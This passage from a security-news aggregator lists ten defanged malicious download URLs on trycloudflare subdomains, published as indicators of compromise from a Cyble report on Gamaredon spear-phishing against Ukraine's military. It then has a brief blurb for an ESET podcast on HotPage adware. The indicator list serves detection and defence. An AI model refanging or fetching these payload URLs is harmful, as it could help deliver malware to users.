hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar
URL
Malicious URL

hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar
URL
Malicious URL

hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar
URL
Malicious URL

hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar
URL
Malicious URL

hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar
URL
Malicious URL

hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar
URL
Malicious URL

The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.

Blog – Cyble – Read More

ESET Research Podcast: HotPage

September 8, 2024/in Company Blogs

ESET researchers discuss HotPage, a recently discovered adware armed with a highest-privilege, yet vulnerable, Microsoft-signed driver

WeLiveSecurity – Read More